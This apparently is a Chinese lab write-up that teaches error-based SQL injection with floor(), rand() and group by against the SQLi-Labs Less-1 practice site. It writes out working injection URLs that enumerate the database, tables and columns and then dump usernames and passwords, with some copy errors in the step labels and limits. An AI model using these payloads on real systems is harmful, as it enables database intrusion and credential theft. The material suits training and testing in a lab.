实验目的
熟悉报错功能函数floor()的用法,掌握基于报错的SQL注入基本流程。
实验原理
(1)关于报错注入
基于报错的注入,是指通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号、用户名等)通过页面的错误提示回显出来。
报错注入一般需要具备两个前提条件:(1) Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上;
(2)后台未对一些具有报错功能的函数进行过滤。
常用的报错功能函数包括extractvalue()、updatexml()、floor()、exp()等。
(2)关于floor()函数
在进行报错注入时,floor()函数一般需要与rand()、count()、group by联用。作用:
floor(x):对参数x向下取整;
rand():生成一个0~1之间的随机浮点数;
count(*):统计某个表下总共有多少条记录;
group by x:按照(by)一定的规则(x)进行分组;
报错原理: floor()函数与group by、rand()联用时,如果临时表中没有该主键,则在插入前会再计算一次rand(),然后再由group by将计算出来的主键直接插入到临时表格中,导致主键重复报错,错误信息如: Duplicate entry '.' for key'group_key' 。
实验步骤
本实验的目标是:以SQLi-Labs网站的Less-1为入口,借助floor()函数与rand().count()、group by的联用,利用基于报错的注入方式获取SQLi-Labs 网站的登录用户名和密码。
1..访问SQLi-Labs 网站
注:因为我把sqli-labs文件名字改为了sql,所以以下sqli-labs均以sql表示
在攻击机Pentest-Atk打开FireFox浏览器,并访问靶机A-SQL上的SQL网站Less-1。访问的URL为:
http://[靶机IP]/sql/Less-1/
(注意大小写)
文章图片
注:该实验中Firefox浏览器已经提前安装好HackBar插件,在上图的界面中右击鼠标,点击 检查 即可进入控制台,随后点击HackBar即可使用该插件 (部分机型按F12即可进入控制台)
在输入框里输好payload之后点击Execute执行
文章图片
2.寻找注入点
分别使用以下3条payload寻找注入点及判断注入点的类型:
http://[靶机IP]/sql/Less-1/?id=1'
运行报错
文章图片
http://[靶机IP]/sql/Less-1/?id=1' and '1'='1
运行正常
文章图片
http://[靶机IP]/sql/Less-1/?id=1' and '1'='2
运行异常
文章图片
3.获取网站当前所在数据库的库名
使用以下payload获取网站所在数据库的名字
http://[靶机IP]/sql/Less-1/?id=-1' and (select 1 from (select count(*) ,concat(database( ),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
结果为:security
文章图片
4.获取数据库security的全部表名
使用以下payload获取数据库security的全部表名:
http://[靶机IP]/sql/Less-1/?id=-1' and (select 1 from (select count(*) , concat((select table_name from information_schema.tables where table_schema= 'security' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
显示security 库中的第1张表的名字为emails。
文章图片
http://[靶机IP]/sql/Less-1/?id=-1' and (select 1 from (select count(*) , concat((select table_name from information_schema.tables where table_schema= 'security' limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
显示security 库中的第2张表的名字为referers
文章图片
http://[靶机IP]/sql/Less-1/?id=-1' and (select 1 from (select count(*) , concat((select table_name from information_schema.tables where table_schema= 'security' limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
显示security 库中的第3张表的名字为uagents
文章图片
http://[靶机IP]/sql/Less-1/?id=-1' and (select 1 from (select count(*) , concat((select table_name from information_schema.tables where table_schema= 'security' limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
显示security 库中的第4张表的名字为users
文章图片
以上显示结果中,第4张表users当中可能存放着网站用户的基本信息。
5.获取users表的全部字段名
使用以下 payload 获取 users表的字段名:
http:/ / [靶机IP]/sql/Less-1/?id=-1' and (select 1 from (select count(*) ,concat((select column_name from information_schema.columns where table_schema= 'security' and table_name= 'users' limit 0,1),floor(rand(0)*2)) x from information_schema.tables group by x)a) --+
显示users表中的第1个字段名字为id。
文章图片
http:/ / [靶机IP]/sql/Less-1/?id=-1' and (select 1 from (select count(*) ,concat((select column_name from information_schema.columns where table_schema= 'security' and table_name= 'users' limit 1,1),floor(rand(0)*2)) x from information_schema.tables group by x)a) --+
显示users表中的第1个字段名字为username。
文章图片
http:/ / [靶机IP]/sql/Less-1/?id=-1' and (select 1 from (select count(*) ,concat((select column_name from information_schema.columns where table_schema= 'security' and table_name= 'users' limit 2,1),floor(rand(0)*2)) x from information_schema.tables group by x)a) --+
显示users表中的第1个字段名字为password。
文章图片
6.获取users表id、 username和 password字段的全部值。
由于users表中存放着多组用户名和密码的数据,而每次只能显示一组数据,我们可以通过limit M,N的方式逐条显示,如
(1)显示第1组数据
http:/ / [靶机IP]/sql/Less-1/?id=-1' and (select 1 from (select count(*) , concat((select concat_ws( ',' ,id,username,password ) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
文章图片
(2)显示第2组数据
http:/ / [靶机IP]/sql/Less-1/?id=-1' and (select 1 from (select count(*) , concat((select concat_ws( ',' ,id,username,password ) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
文章图片
(3)显示第3组数据
http:/ / [靶机IP]/sql/Less-1/?id=-1' and (select 1 from (select count(*) , concat((select concat_ws( ',' ,id,username,password ) from security.users limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
文章图片
以此类推,可通过修改limit后面的参数,将users表中存放的所有用户信息全部暴露出来。
实验至此结束。
实验总结
本次实验,成功实现了对存在字符型GET注入点的网站的手工SQL注入,熟悉
了floor()、rand()、count()、group by的用法,掌握了基于报错的注入方法和流程。
【sql|SQL注入——基于报错的注入(2)】
推荐阅读
- redis|2021-11-13 记录(Java连接远程Redis的报错信息和解决办法)
- 安全|深入分析H2数据库控制台中无需身份验证的RCE漏洞
- 面试|面试官(看到你熟练性能调优,可以说一下你对MySQL索引的理解())
- mysql|文末送书 | WAF 那些事
- 数据库|【数据库原理及应用教程】【数据库系统的体系结构】【1.4-1.6】
- 数据库|【数据库原理及应用教程】【数据库系统概述】
- 数据库|【数据库原理及应用教程】【数据模型】【1.7-1.10】
- CloudCanal x StarRocks 在医疗大健康实时数仓领域的落地与实践
- 《mongodb经典入门》|四.MongoDB入门-Java操作MongoDB